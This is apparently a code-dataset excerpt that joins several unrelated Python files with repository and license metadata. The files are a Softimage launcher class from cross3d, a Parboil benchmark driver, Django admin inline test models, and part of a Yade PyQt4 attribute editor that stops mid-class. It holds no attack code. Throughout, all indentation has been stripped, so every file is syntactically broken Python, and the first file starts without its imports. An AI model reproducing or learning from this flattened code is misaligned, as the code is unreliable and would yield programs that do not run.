from cross3d.abstract.external import External as AbstractExternal
#------------------------------------------------------------------------------------------------------------------------
class External(AbstractExternal):
# In case the software is installed but not used don't find it when not passing in a version
_ignoredVersions = set(os.environ.get('CROSS3D_STUDIO_IGNORED_SOFTIMAGE', '').split(','))
# map years to version numbers
_yearForVersion = {'8': '2010', '9': '2011', '10': '2012', '11': '2013', '12': '2014', '13': '2015'}
@classmethod
def name(cls):
return 'Softimage'
@classmethod
def getFileVersion(cls, filepath):
"""
Reads the xsi version of an xsi file from the associated scntoc.
"""
scntoc_path = filepath + 'toc'
if os.path.isfile(scntoc_path):
tree = ET.parse(scntoc_path)
root = tree.getroot()
return root.get('xsi_version')
return None
@classmethod
def runScript(cls, script, version=None, architecture=64, language=ScriptLanguage.Python, debug=False, headless=True):
if os.path.exists(script):
scriptPath = script
else:
scriptPath = cls.scriptPath()
with open(scriptPath, "w") as fle:
fle.write(script)
binary = os.path.join(cls.binariesPath(version, architecture), 'xsibatch.exe' if headless else 'xsi.exe')
scriptArgumentName = '-script' if headless else '-uiscript'
# Contrinue makes sure there is no prompts.
command = [binary, '-continue', scriptArgumentName, scriptPath]
# Processing means that it will not shot the GUI and not grab a license.
if headless:
command.insert(1, '-processing')
process = subprocess.Popen(command, stdout=subprocess.PIPE)
# TODO: This is the way to check for success. But it is blocking.
# Writing the log file.
with open(cls.scriptLog(), 'w') as fle:
fle.write(process.stdout.read())
# Checking the error in the log file.
with open(cls.scriptLog()) as fle:
content = fle.read()
return False if 'FATAL' in content else True
@classmethod
def binariesPath(cls, version=None, architecture=64, language='English'):
""" Finds the install path for various software installations. If version is None, the default
it will return the latest installed version of the software. Raises cross3d.Exceptions.SoftwareNotInstalled
if the software is not installed.
:param version: The version of the software. Default is None
:param architecture: The bit type to query the registry for(32, 64). Default is 64
:param language: Optional language that may be required for specific softwares.
"""
from cross3d.migrate import winregistry
hive = 'HKEY_LOCAL_MACHINE'
hkey = r'Software\Autodesk\Softimage\InstallPaths'
ret = None
if version == None:
# Find the latest version
versions = winregistry.listRegKeyValues(hive, hkey, architecture=architecture)
for version in sorted(versions, key= lambda i: i[0], reverse=True):
if version[0] not in cls._ignoredVersions:
ret = version[1]
break
else:
version = cls._yearForVersion.get(unicode(version), version)
try:
ret = winregistry.registryValue(hive, hkey, unicode(version), architecture)[0]
except WindowsError:
raise Exceptions.SoftwareNotInstalled('Softimage', version=version, architecture=architecture, language=language)
# If the version is not installed this will return '.', we want to return False.
if ret:
return os.path.join(os.path.normpath(ret), 'Application', 'bin')
raise Exceptions.SoftwareNotInstalled('Softimage', version=version, architecture=architecture, language=language)
|
mit
| -2,558,668,745,692,272,000
| 36.790909
| 121
| 0.669088
| false
| 3.591751
| false
| false
| false
|
Geof23/SESABench_II
|
parboil/driver/benchmark.py
|
1
|
19162
|
# (c) 2007 The Board of Trustees of the University of Illinois.
import sys
import os
from os import path
import re
from itertools import imap, repeat, chain
import globals
import process
import parboilfile as pbf
from futures import Future
from error import ErrorType
class Benchmark(object):
"""A benchmark.
If the benchmark is malformed or otherwise invalid, only the 'name' and
'invalid' fields will be set. Otherwise all fields will be set.
Fields:
name The name of the benchmark. This is also the benchmark
directory name.
invalid None if the benchmark is valid; otherwise, an exception
describing why the benchmark is invalid.
path Full path of the benchmark directory.
descr A description of the benchmark.
impls A dictionary of benchmark source implementations.
datas A dictionary of data sets used to run the benchmark."""
def __init__(self, name, path = None, impls = [], datasets = [],
description=None, invalid=None):
self.name = name
self.invalid = invalid
if invalid is None:
self.path = path
self.impls = dict(imap(lambda i: (i.name, i), impls))
self.datas = dict(imap(lambda i: (i.name, i), datasets))
self.descr = description
def createFromName(name):
"""Scan the benchmark directory for the benchmark named 'name'
and create a benchmark object for it."""
bmkdir = globals.benchdir.getChildByName(name)
datadir = globals.datadir.getChildByName(name)
descr = process.read_description_file(bmkdir)
try:
# Scan implementations of the benchmark
impls = [BenchImpl.createFromDir(impl)
for impl in process.scan_for_benchmark_versions(bmkdir)]
# Scan data sets of the benchmark
datas = [BenchDataset.createFromDir(data)
for data in process.scan_for_benchmark_datasets(datadir)]
# If no exception occurred, the benchmark is valid
return Benchmark(name, bmkdir.getPath(), impls, datas, descr)
finally:
pass
#except Exception, e:
# return Benchmark(name, invalid=e)
createFromName = staticmethod(createFromName)
def describe(self):
"""Return a string describing this benchmark."""
if self.invalid:
return "Error in benchmark:\n" + str(self.invalid)
if self.descr is None:
header = "Benchmark '" + self.name + "'"
else:
header = self.descr
impls = " ".join([impl.name for impl in self.impls.itervalues()])
datas = " ".join([data.name for data in self.datas.itervalues()])
return header + "\nVersions: " + impls + "\nData sets: " + datas
def instance_check(x):
if not isinstance(x, Benchmark):
raise TypeError, "argument must be an instance of Benchmark"
instance_check = staticmethod(instance_check)
class BenchImpl(object):
"""An implementation of a benchmark."""
def __init__(self, dir, description=None):
if not isinstance(dir, pbf.Directory):
raise TypeEror, "dir must be a directory"
self.name = dir.getName()
self.dir = dir
self.descr = description
def createFromDir(dir):
"""Scan the directory containing a benchmark implementation
and create a BenchImpl object from it."""
# Get the description from a file, if provided
descr = process.read_description_file(dir)
return BenchImpl(dir, descr)
createFromDir = staticmethod(createFromDir)
def makefile(self, benchmark, target=None, action=None, platform=None, opt={}):
"""Run this implementation's makefile."""
self.platform = platform
Benchmark.instance_check(benchmark)
def perform():
srcdir = path.join('src', self.name)
builddir = path.join('build', self.name)
if self.platform == None: platform = 'default'
else: platform = self.platform
env={'SRCDIR':srcdir,
'BUILDDIR':builddir + '_' + platform,
'BIN':path.join(builddir+'_'+platform,benchmark.name),
'PARBOIL_ROOT':globals.root,
'PLATFORM':platform,
'BUILD':self.name}
env.update(opt)
mkfile = globals.root + os.sep + 'common' + os.sep + 'mk'
# Run the makefile to build the benchmark
ret = process.makefile(target=target,
action=action,
filepath=path.join(mkfile, "Makefile"),
env=env)
if ret == True:
return ErrorType.Success
else:
return ErrorType.CompileError
# Go to the benchmark directory before building
return process.with_path(benchmark.path, perform)
def build(self, benchmark, platform):
"""Build an executable of this benchmark implementation."""
return self.makefile(benchmark, action='build', platform=platform)
def isBuilt(self, benchmark, platform):
"""Determine whether the executable is up to date."""
return self.makefile(benchmark, action='q', platform=platform) == ErrorType.Success
def clean(self, benchmark, platform):
"""Remove build files for this benchmark implementation."""
return self.makefile(benchmark, action='clean', platform=platform)
def run(self, benchmark, dataset, do_output=True, extra_opts=[], platform=None):
"""Run this benchmark implementation.
Return True if the benchmark terminated normally or False
if there was an error."""
if platform == None:
self.platform = 'default'
else:
self.platform = platform
# Ensure that the benchmark has been built
if not self.isBuilt(benchmark, platform):
rc = self.build(benchmark, platform)
# Stop if 'make' failed
if rc != ErrorType.Success: return rc
def perform():
if self.platform == None:
platform = 'default'
else:
platform = self.platform
# Run the program
#exename = path.join('build', self.name+'_'+platform, benchmark.name)
#args = [exename] + extra_opts + dataset.getCommandLineArguments(benchmark, do_output)
#rc = process.spawnwaitv(exename, args)
args = extra_opts + dataset.getCommandLineArguments(benchmark, do_output)
args = reduce(lambda x, y: x + ' ' + y, args)
###
try:
rc = self.makefile(benchmark, action='run', platform=platform, opt={"ARGS":args})
except KeyboardInterrupt:
rc = ErrorType.Killed
# Program exited with error?
# if rc != 0: return ErrorType.RunFailed
# return ErrorType.Success
return rc
return process.with_path(benchmark.path, perform)
def debug(self, benchmark, dataset, do_output=True, extra_opts=[], platform=None):
"""Debug this benchmark implementation."""
if platform == None:
self.platform = 'default'
else:
self.platform = platform
# Ensure that the benchmark has been built
if not self.isBuilt(benchmark, platform):
rc = self.build(benchmark, platform)
# Stop if 'make' failed
if rc != ErrorType.Success: return rc
def perform():
if self.platform == None:
platform = 'default'
else:
platform = self.platform
# Run the program
args = extra_opts + dataset.getCommandLineArguments(benchmark, do_output)
args = reduce(lambda x, y: x + ' ' + y, args)
###
rc = self.makefile(benchmark, action='debug', platform=platform, opt={"ARGS":args})
# Program exited with error?
if rc != 0: return ErrorType.RunFailed
return ErrorType.Success
return process.with_path(benchmark.path, perform)
def check(self, benchmark, dataset):
"""Check the output from the last run of this benchmark
implementation.
Return True if the output checks successfully or False
otherwise."""
def perform():
output_file = dataset.getTemporaryOutputFile(benchmark).getPath()
reference_file = dataset.getReferenceOutputPath()
compare = os.path.join('tools', 'compare-output')
rc = process.spawnwaitl(compare,
compare, reference_file, output_file)
# Program exited with error, or mismatch in output?
if rc != 0: return False
return True
return process.with_path(benchmark.path, perform)
def __str__(self):
return "<BenchImpl '" + self.name + "'>"
class BenchDataset(object):
"""Data sets for running a benchmark."""
def __init__(self, dir, in_files=[], out_files=[], parameters=[],
description=None):
if not isinstance(dir, pbf.Directory):
raise TypeError, "dir must be a pbf.Directory"
self.name = dir.getName()
self.dir = dir
self.inFiles = in_files
self.outFiles = out_files
self.parameters = parameters
self.descr = description
def createFromDir(dir):
"""Scan the directory containing a dataset
and create a BenchDataset object from it."""
# Identify the paths where files may be found
input_dir = dir.getChildByName('input')
output_dir = dir.getChildByName('output')
#benchmark_path = path.join(globals.root, 'benchmarks', name)
def check_default_input_files():
# This function is called to see if the input file set
# guessed by scanning the input directory can be used
if invalid_default_input_files:
raise ValueError, "Cannot infer command line when there are multiple input files in a data set\n(Fix by adding an input DESCRIPTION file)"
if input_dir.exists():
input_descr = process.read_description_file(input_dir)
input_files = input_dir.scanAndReturnNames()
# If more than one input file was found, cannot use the default
# input file list produced by scanning the directory
invalid_default_input_files = len(input_files) > 1
else:
# If there's no input directory, assume the benchmark
# takes no input
input_descr = None
input_files = []
invalid_default_input_files = False
# Read the text of the input description file
if input_descr is not None:
(parameters, input_files1, input_descr) = \
unpack_dataset_description(input_descr, input_files=None)
if input_files1 is None:
# No override value given; use the default
check_default_input_files()
else:
input_files = input_files1
else:
check_default_input_files()
parameters = []
# Look for output files
output_descr = process.read_description_file(output_dir)
output_files = output_dir.scanAndReturnNames()
if len(output_files) > 1:
raise ValueError, "Multiple output files not supported"
# Concatenate input and output descriptions
if input_descr and output_descr:
descr = input_descr + "\n\n" + output_descr
else:
descr = input_descr or output_descr
return BenchDataset(dir, input_files, output_files, parameters, descr)
createFromDir = staticmethod(createFromDir)
def getName(self):
"""Get the name of this dataset."""
return self.name
def getTemporaryOutputDir(self, benchmark):
"""Get the pbf.Directory for the output of a benchmark run.
This function should always return the same pbf.Directory if its parameters
are the same. The output path is not the path where the reference
output is stored."""
rundir = globals.benchdir.getChildByName(benchmark.name).getChildByName('run')
if rundir.getChildByName(self.name) is None:
datasetpath = path.join(rundir.getPath(), self.name)
filepath = path.join(datasetpath, self.outFiles[0])
rundir.addChild(pbf.Directory(datasetpath, [pbf.File(filepath, False)]))
return rundir.getChildByName(self.name)
def getTemporaryOutputFile(self, benchmark):
"""Get the pbf.File for the output of a benchmark run.
This function should always return the same pbf.File if its parameters
are the same. The output path is not where the referrence output
is stored."""
return self.getTemporaryOutputDir(benchmark).getChildByName(self.outFiles[0])
def getReferenceOutputPath(self):
"""Get the name of the reference file, to which the output of a
benchmark run should be compared."""
return path.join(self.dir.getPath(), 'output', self.outFiles[0])
def getCommandLineArguments(self, benchmark, do_output=True):
"""Get the command line arguments that should be passed to the
executable to run this data set. If 'output' is True, then
the executable will be passed flags to save its output to a file.
Directories to hold ouptut files are created if they do not exist."""
args = []
# Add arguments to pass input files to the benchmark
if self.inFiles:
in_files = ",".join([path.join(self.dir.getPath(),'input', x)
for x in self.inFiles])
args.append("-i")
args.append(in_files)
# Add arguments to store the output somewhere, if output is
# desired
if do_output and self.outFiles:
if len(self.outFiles) != 1:
raise ValueError, "only one output file is supported"
out_file = self.getTemporaryOutputFile(benchmark)
args.append("-o")
args.append(out_file.getPath())
# Ensure that a directory exists for the output
self.getTemporaryOutputDir(benchmark).touch()
args += self.parameters
return args
def __str__(self):
return "<BenchData '" + self.name + "'>"
def unpack_dataset_description(descr, parameters=[], input_files=[]):
"""Read information from the raw contents of a data set description
file. Optional 'parameters' and 'input_files' arguments may be
given, which will be retained unless overridden by the description
file."""
leftover = []
split_at_colon = re.compile(r"^\s*([a-zA-Z]+)\s*:(.*)$")
# Initialize these to default empty strings
parameter_text = None
input_file_text = None
# Scan the description line by line
for line in descr.split('\n'):
m = split_at_colon.match(line)
if m is None: continue
# This line appears to declare something that should be
# interpreted
keyword = m.group(1)
if keyword == "Parameters":
parameter_text = m.group(2)
elif keyword == "Inputs":
input_file_text = m.group(2)
# else, ignore the line
# Split the strings into (possibly) multiple arguments, discarding
# whitespace
if parameter_text is not None: parameters = parameter_text.split()
if input_file_text is not None: input_files = input_file_text.split()
return (parameters, input_files, descr)
def version_scanner():
"""version_scanner() -> (path -> pbf.Directory)
Return a function to find benchmark versions in the src
directory for the benchmark."""
return lambda x: pbf.scan_file(x, True, lambda y: pbf.Directory(y), ['.svn'])
def find_benchmarks():
"""Find benchmarks in the repository. The benchmarks are
identified, but their contents are not scanned immediately. A
dictionary is returned mapping benchmark names to futures
containing the benchmarks."""
if not globals.root:
raise ValueError, "root directory has not been set"
# Scan all benchmarks in the 'benchmarks' directory and
# lazily create benchmark objects.
db = {}
try:
globals.benchdir.scan()
globals.datadir.scan()
for bmkdir in globals.benchdir.getScannedChildren():
bmk = Future(lambda bmkdir=bmkdir: Benchmark.createFromName(bmkdir.getName()))
db[bmkdir.getName()] = bmk
except OSError, e:
sys.stdout.write("Benchmark directory not found!\n\n")
return {}
return db
def _desc_file(dpath):
"""_desc_file(dpath)
Returns a pbf.File for an optional description file in the directory dpath."""
return pbf.File(path.join(dpath,'DESCRIPTION'), False)
def benchmark_scanner():
"""benchmark_scanner -> (path -> pbf.Directory)
Returns a function which will scan a filename and create a pbf.Directory
for a benchmark represented by that name."""
def create_benchmark_dir(dpath):
expected = [pbf.Directory(path.join(dpath,'src'), [], version_scanner()),
pbf.Directory(path.join(dpath,'tools'),
[pbf.File(path.join(dpath,'compare-output'))]),
pbf.Directory(path.join(dpath,'build'), must_exist=False),
pbf.Directory(path.join(dpath,'run'), must_exist=False),
_desc_file(dpath)]
return pbf.Directory(dpath, expected)
return lambda x: pbf.scan_file(x, True, create_benchmark_dir,['_darcs','.svn'])
def dataset_scanner():
"""dataset_scanner -> (path -> pbf.Directory)
Returns a function which will scan a filename and create a pbf.Directory
for a folder containing datasets for the benchmark of the same name."""
def create_dataset_dir(dpath):
simple_scan = lambda x: pbf.scan_file(x)
expected = [pbf.Directory(path.join(dpath,'input'),
[_desc_file(path.join(dpath,'input'))], simple_scan),
pbf.Directory(path.join(dpath,'output'), [], simple_scan),
_desc_file(dpath)]
return pbf.Directory(dpath, expected)
return lambda x: pbf.scan_file(x, True, create_dataset_dir, ['.svn', '_darcs'])
def dataset_repo_scanner():
"""dataset_repo_scanner -> (path -> pbf.Directory)
Returns a function which will scan a filename and create a pbf.Directory
for a folder containing a dataset repository for parboil benchmarks."""
benchmark_dsets_scanner = lambda x: pbf.Directory(x, [], dataset_scanner())
return lambda x: pbf.scan_file(x, True, benchmark_dsets_scanner)
|
mit
| -8,829,396,101,898,536,000
| 35.921002
| 154
| 0.608235
| false
| 4.42132
| false
| false
| false
|
theo-l/django
|
tests/admin_inlines/models.py
|
10
|
7855
|
"""
Testing of admin inline formsets.
"""
import random
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.db import models
class Parent(models.Model):
name = models.CharField(max_length=50)
def __str__(self):
return self.name
class Teacher(models.Model):
name = models.CharField(max_length=50)
def __str__(self):
return self.name
class Child(models.Model):
name = models.CharField(max_length=50)
teacher = models.ForeignKey(Teacher, models.CASCADE)
content_type = models.ForeignKey(ContentType, models.CASCADE)
object_id = models.PositiveIntegerField()
parent = GenericForeignKey()
def __str__(self):
return 'I am %s, a child of %s' % (self.name, self.parent)
class Book(models.Model):
name = models.CharField(max_length=50)
def __str__(self):
return self.name
class Author(models.Model):
name = models.CharField(max_length=50)
books = models.ManyToManyField(Book)
class NonAutoPKBook(models.Model):
rand_pk = models.IntegerField(primary_key=True, editable=False)
author = models.ForeignKey(Author, models.CASCADE)
title = models.CharField(max_length=50)
def save(self, *args, **kwargs):
while not self.rand_pk:
test_pk = random.randint(1, 99999)
if not NonAutoPKBook.objects.filter(rand_pk=test_pk).exists():
self.rand_pk = test_pk
super().save(*args, **kwargs)
class NonAutoPKBookChild(NonAutoPKBook):
pass
class EditablePKBook(models.Model):
manual_pk = models.IntegerField(primary_key=True)
author = models.ForeignKey(Author, models.CASCADE)
title = models.CharField(max_length=50)
class Holder(models.Model):
dummy = models.IntegerField()
class Inner(models.Model):
dummy = models.IntegerField()
holder = models.ForeignKey(Holder, models.CASCADE)
readonly = models.CharField("Inner readonly label", max_length=1)
def get_absolute_url(self):
return '/inner/'
class Holder2(models.Model):
dummy = models.IntegerField()
class Inner2(models.Model):
dummy = models.IntegerField()
holder = models.ForeignKey(Holder2, models.CASCADE)
class Holder3(models.Model):
dummy = models.IntegerField()
class Inner3(models.Model):
dummy = models.IntegerField()
holder = models.ForeignKey(Holder3, models.CASCADE)
# Models for ticket #8190
class Holder4(models.Model):
dummy = models.IntegerField()
class Inner4Stacked(models.Model):
dummy = models.IntegerField(help_text="Awesome stacked help text is awesome.")
holder = models.ForeignKey(Holder4, models.CASCADE)
class Meta:
constraints = [
models.UniqueConstraint(fields=['dummy', 'holder'], name='unique_stacked_dummy_per_holder')
]
class Inner4Tabular(models.Model):
dummy = models.IntegerField(help_text="Awesome tabular help text is awesome.")
holder = models.ForeignKey(Holder4, models.CASCADE)
class Meta:
constraints = [
models.UniqueConstraint(fields=['dummy', 'holder'], name='unique_tabular_dummy_per_holder')
]
# Models for ticket #31441
class Holder5(models.Model):
dummy = models.IntegerField()
class Inner5Stacked(models.Model):
name = models.CharField(max_length=10)
select = models.CharField(choices=(('1', 'One'), ('2', 'Two')), max_length=10)
text = models.TextField()
dummy = models.IntegerField()
holder = models.ForeignKey(Holder5, models.CASCADE)
class Inner5Tabular(models.Model):
name = models.CharField(max_length=10)
select = models.CharField(choices=(('1', 'One'), ('2', 'Two')), max_length=10)
text = models.TextField()
dummy = models.IntegerField()
holder = models.ForeignKey(Holder5, models.CASCADE)
# Models for #12749
class Person(models.Model):
firstname = models.CharField(max_length=15)
class OutfitItem(models.Model):
name = models.CharField(max_length=15)
class Fashionista(models.Model):
person = models.OneToOneField(Person, models.CASCADE, primary_key=True)
weaknesses = models.ManyToManyField(OutfitItem, through='ShoppingWeakness', blank=True)
class ShoppingWeakness(models.Model):
fashionista = models.ForeignKey(Fashionista, models.CASCADE)
item = models.ForeignKey(OutfitItem, models.CASCADE)
# Models for #13510
class TitleCollection(models.Model):
pass
class Title(models.Model):
collection = models.ForeignKey(TitleCollection, models.SET_NULL, blank=True, null=True)
title1 = models.CharField(max_length=100)
title2 = models.CharField(max_length=100)
# Models for #15424
class Poll(models.Model):
name = models.CharField(max_length=40)
class Question(models.Model):
text = models.CharField(max_length=40)
poll = models.ForeignKey(Poll, models.CASCADE)
class Novel(models.Model):
name = models.CharField(max_length=40)
class NovelReadonlyChapter(Novel):
class Meta:
proxy = True
class Chapter(models.Model):
name = models.CharField(max_length=40)
novel = models.ForeignKey(Novel, models.CASCADE)
class FootNote(models.Model):
"""
Model added for ticket 19838
"""
chapter = models.ForeignKey(Chapter, models.PROTECT)
note = models.CharField(max_length=40)
# Models for #16838
class CapoFamiglia(models.Model):
name = models.CharField(max_length=100)
class Consigliere(models.Model):
name = models.CharField(max_length=100, help_text='Help text for Consigliere')
capo_famiglia = models.ForeignKey(CapoFamiglia, models.CASCADE, related_name='+')
class SottoCapo(models.Model):
name = models.CharField(max_length=100)
capo_famiglia = models.ForeignKey(CapoFamiglia, models.CASCADE, related_name='+')
class ReadOnlyInline(models.Model):
name = models.CharField(max_length=100, help_text='Help text for ReadOnlyInline')
capo_famiglia = models.ForeignKey(CapoFamiglia, models.CASCADE)
# Models for #18433
class ParentModelWithCustomPk(models.Model):
my_own_pk = models.CharField(max_length=100, primary_key=True)
name = models.CharField(max_length=100)
class ChildModel1(models.Model):
my_own_pk = models.CharField(max_length=100, primary_key=True)
name = models.CharField(max_length=100)
parent = models.ForeignKey(ParentModelWithCustomPk, models.CASCADE)
def get_absolute_url(self):
return '/child_model1/'
class ChildModel2(models.Model):
my_own_pk = models.CharField(max_length=100, primary_key=True)
name = models.CharField(max_length=100)
parent = models.ForeignKey(ParentModelWithCustomPk, models.CASCADE)
def get_absolute_url(self):
return '/child_model2/'
# Models for #19425
class BinaryTree(models.Model):
name = models.CharField(max_length=100)
parent = models.ForeignKey('self', models.SET_NULL, null=True, blank=True)
# Models for #19524
class LifeForm(models.Model):
pass
class ExtraTerrestrial(LifeForm):
name = models.CharField(max_length=100)
class Sighting(models.Model):
et = models.ForeignKey(ExtraTerrestrial, models.CASCADE)
place = models.CharField(max_length=100)
# Models for #18263
class SomeParentModel(models.Model):
name = models.CharField(max_length=1)
class SomeChildModel(models.Model):
name = models.CharField(max_length=1)
position = models.PositiveIntegerField()
parent = models.ForeignKey(SomeParentModel, models.CASCADE)
readonly_field = models.CharField(max_length=1)
# Other models
class ProfileCollection(models.Model):
pass
class Profile(models.Model):
collection = models.ForeignKey(ProfileCollection, models.SET_NULL, blank=True, null=True)
first_name = models.CharField(max_length=100)
last_name = models.CharField(max_length=100)
|
bsd-3-clause
| 4,038,649,694,587,854,300
| 24.669935
| 103
| 0.708466
| false
| 3.554299
| false
| false
| false
|
bchareyre/ratchet
|
gui/qt4/SerializableEditor.py
|
1
|
34633
|
# encoding: utf-8
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4 import QtGui
import re,itertools
import logging
logging.trace=logging.debug
logging.basicConfig(level=logging.INFO)
from yade import *
import yade.qt
try:
from minieigen import *
except ImportError:
from miniEigen import *
seqSerializableShowType=True # show type headings in serializable sequences (takes vertical space, but makes the type hyperlinked)
# BUG: cursor is moved to the beginnign of the input field even if it has focus
#
# checking for focus seems to return True always and cursor is never moved
#
# the 'True or' part effectively disables the condition (so that the cursor is moved always), but it might be fixed in the future somehow
#
# if True or w.hasFocus(): w.home(False)
#
#
def makeWrapperHref(text,className,attr=None,static=False):
"""Create clickable HTML hyperlink to a Yade class or its attribute.
:param className: name of the class to link to.
:param attr: attribute to link to. If given, must exist directly in given *className*; if not given or empty, link to the class itself is created and *attr* is ignored.
:return: HTML with the hyperref.
"""
if not static: return '<a href="%s#yade.wrapper.%s%s">%s</a>'%(yade.qt.sphinxDocWrapperPage,className,(('.'+attr) if attr else ''),text)
else: return '<a href="%s#ystaticattr-%s.%s">%s</a>'%(yade.qt.sphinxDocWrapperPage,className,attr,text)
def serializableHref(ser,attr=None,text=None):
"""Return HTML href to a *ser* optionally to the attribute *attr*.
The class hierarchy is crawled upwards to find out in which parent class is *attr* defined,
so that the href target is a valid link. In that case, only single inheritace is assumed and
the first class from the top defining *attr* is used.
:param ser: object of class deriving from :yref:`Serializable`, or string; if string, *attr* must be empty.
:param attr: name of the attribute to link to; if empty, linke to the class itself is created.
:param text: visible text of the hyperlink; if not given, either class name or attribute name without class name (when *attr* is not given) is used.
:returns: HTML with the hyperref.
"""
# klass is a class name given as string
if isinstance(ser,str):
if attr: raise InvalidArgument("When *ser* is a string, *attr* must be empty (only class link can be created)")
return makeWrapperHref(text if text else ser,ser)
# klass is a type object
if attr:
klass=ser.__class__
while attr in dir(klass.__bases__[0]): klass=klass.__bases__[0]
if not text: text=attr
else:
klass=ser.__class__
if not text: text=klass.__name__
return makeWrapperHref(text,klass.__name__,attr,static=(attr and getattr(klass,attr)==getattr(ser,attr)))
class AttrEditor():
"""Abstract base class handing some aspects common to all attribute editors.
Holds exacly one attribute which is updated whenever it changes."""
def __init__(self,getter=None,setter=None):
self.getter,self.setter=getter,setter
self.hot,self.focused=False,False
self.widget=None
def refresh(self): pass
def update(self): pass
def isHot(self,hot=True):
"Called when the widget gets focus; mark it hot, change colors etc."
if hot==self.hot: return
self.hot=hot
if hot: self.setStyleSheet('QWidget { background: red }')
else: self.setStyleSheet('QWidget { background: none }')
def sizeHint(self): return QSize(150,12)
def trySetter(self,val):
try: self.setter(val)
except AttributeError: self.setEnabled(False)
self.isHot(False)
class AttrEditor_Bool(AttrEditor,QFrame):
def __init__(self,parent,getter,setter):
AttrEditor.__init__(self,getter,setter)
QFrame.__init__(self,parent)
self.checkBox=QCheckBox(self)
lay=QVBoxLayout(self); lay.setSpacing(0); lay.setMargin(0); lay.addStretch(1); lay.addWidget(self.checkBox); lay.addStretch(1)
self.checkBox.clicked.connect(self.update)
def refresh(self): self.checkBox.setChecked(self.getter())
def update(self): self.trySetter(self.checkBox.isChecked())
class AttrEditor_Int(AttrEditor,QSpinBox):
def __init__(self,parent,getter,setter):
AttrEditor.__init__(self,getter,setter)
QSpinBox.__init__(self,parent)
self.setRange(int(-1e9),int(1e9)); self.setSingleStep(1);
self.valueChanged.connect(self.update)
def refresh(self): self.setValue(self.getter())
def update(self): self.trySetter(self.value())
class AttrEditor_Str(AttrEditor,QLineEdit):
def __init__(self,parent,getter,setter):
AttrEditor.__init__(self,getter,setter)
QLineEdit.__init__(self,parent)
self.textEdited.connect(self.isHot)
self.selectionChanged.connect(self.isHot)
self.editingFinished.connect(self.update)
def refresh(self): self.setText(self.getter())
def update(self): self.trySetter(str(self.text()))
class AttrEditor_Float(AttrEditor,QLineEdit):
def __init__(self,parent,getter,setter):
AttrEditor.__init__(self,getter,setter)
QLineEdit.__init__(self,parent)
self.textEdited.connect(self.isHot)
self.selectionChanged.connect(self.isHot)
self.editingFinished.connect(self.update)
def refresh(self):
self.setText(str(self.getter()));
if True or not self.hasFocus(): self.home(False)
def update(self):
try: self.trySetter(float(self.text()))
except ValueError: self.refresh()
class AttrEditor_Quaternion(AttrEditor,QFrame):
def __init__(self,parent,getter,setter):
AttrEditor.__init__(self,getter,setter)
QFrame.__init__(self,parent)
self.grid=QHBoxLayout(self); self.grid.setSpacing(0); self.grid.setMargin(0)
for i in range(4):
if i==3:
f=QFrame(self); f.setFrameShape(QFrame.VLine); f.setFrameShadow(QFrame.Sunken); f.setFixedWidth(4) # add vertical divider (axis | angle)
self.grid.addWidget(f)
w=QLineEdit('')
self.grid.addWidget(w);
w.textEdited.connect(self.isHot)
w.selectionChanged.connect(self.isHot)
w.editingFinished.connect(self.update)
def refresh(self):
val=self.getter(); axis,angle=val.toAxisAngle()
for i in (0,1,2,4):
w=self.grid.itemAt(i).widget(); w.setText(str(axis[i] if i<3 else angle));
if True or not w.hasFocus(): w.home(False)
def update(self):
try:
x=[float((self.grid.itemAt(i).widget().text())) for i in (0,1,2,4)]
except ValueError: self.refresh()
q=Quaternion(Vector3(x[0],x[1],x[2]),x[3]); q.normalize() # from axis-angle
self.trySetter(q)
def setFocus(self): self.grid.itemAt(0).widget().setFocus()
class AttrEditor_Se3(AttrEditor,QFrame):
def __init__(self,parent,getter,setter):
AttrEditor.__init__(self,getter,setter)
QFrame.__init__(self,parent)
self.grid=QGridLayout(self); self.grid.setSpacing(0); self.grid.setMargin(0)
for row,col in itertools.product(range(2),range(5)): # one additional column for vertical line in quaternion
if (row,col)==(0,3): continue
if (row,col)==(0,4): self.grid.addWidget(QLabel(u'←<i>pos</i> ↙<i>ori</i>',self),row,col); continue
if (row,col)==(1,3):
f=QFrame(self); f.setFrameShape(QFrame.VLine); f.setFrameShadow(QFrame.Sunken); f.setFixedWidth(4); self.grid.addWidget(f,row,col); continue
w=QLineEdit('')
self.grid.addWidget(w,row,col);
w.textEdited.connect(self.isHot)
w.selectionChanged.connect(self.isHot)
w.editingFinished.connect(self.update)
def refresh(self):
pos,ori=self.getter(); axis,angle=ori.toAxisAngle()
for i in (0,1,2,4):
w=self.grid.itemAtPosition(1,i).widget(); w.setText(str(axis[i] if i<3 else angle));
if True or not w.hasFocus(): w.home(False)
for i in (0,1,2):
w=self.grid.itemAtPosition(0,i).widget(); w.setText(str(pos[i]));
if True or not w.hasFocus(): w.home(False)
def update(self):
try:
q=[float((self.grid.itemAtPosition(1,i).widget().text())) for i in (0,1,2,4)]
v=[float((self.grid.itemAtPosition(0,i).widget().text())) for i in (0,1,2)]
except ValueError: self.refresh()
qq=Quaternion(Vector3(q[0],q[1],q[2]),q[3]); qq.normalize() # from axis-angle
self.trySetter((v,qq))
def setFocus(self): self.grid.itemAtPosition(0,0).widget().setFocus()
class AttrEditor_MatrixX(AttrEditor,QFrame):
def __init__(self,parent,getter,setter,rows,cols,idxConverter):
'idxConverter converts row,col tuple to either (row,col), (col) etc depending on what access is used for []'
AttrEditor.__init__(self,getter,setter)
QFrame.__init__(self,parent)
self.rows,self.cols=rows,cols
self.idxConverter=idxConverter
self.setContentsMargins(0,0,0,0)
val=self.getter()
self.grid=QGridLayout(self); self.grid.setSpacing(0); self.grid.setMargin(0)
for row,col in itertools.product(range(self.rows),range(self.cols)):
w=QLineEdit('')
self.grid.addWidget(w,row,col);
w.textEdited.connect(self.isHot)
w.selectionChanged.connect(self.isHot)
w.editingFinished.connect(self.update)
def refresh(self):
val=self.getter()
for row,col in itertools.product(range(self.rows),range(self.cols)):
w=self.grid.itemAtPosition(row,col).widget()
w.setText(str(val[self.idxConverter(row,col)]))
if True or not w.hasFocus: w.home(False) # make the left-most part visible, if the text is wider than the widget
def update(self):
try:
val=self.getter()
for row,col in itertools.product(range(self.rows),range(self.cols)):
w=self.grid.itemAtPosition(row,col).widget()
if w.isModified(): val[self.idxConverter(row,col)]=float(w.text())
logging.debug('setting'+str(val))
self.trySetter(val)
except ValueError: self.refresh()
def setFocus(self): self.grid.itemAtPosition(0,0).widget().setFocus()
class AttrEditor_MatrixXi(AttrEditor,QFrame):
def __init__(self,parent,getter,setter,rows,cols,idxConverter):
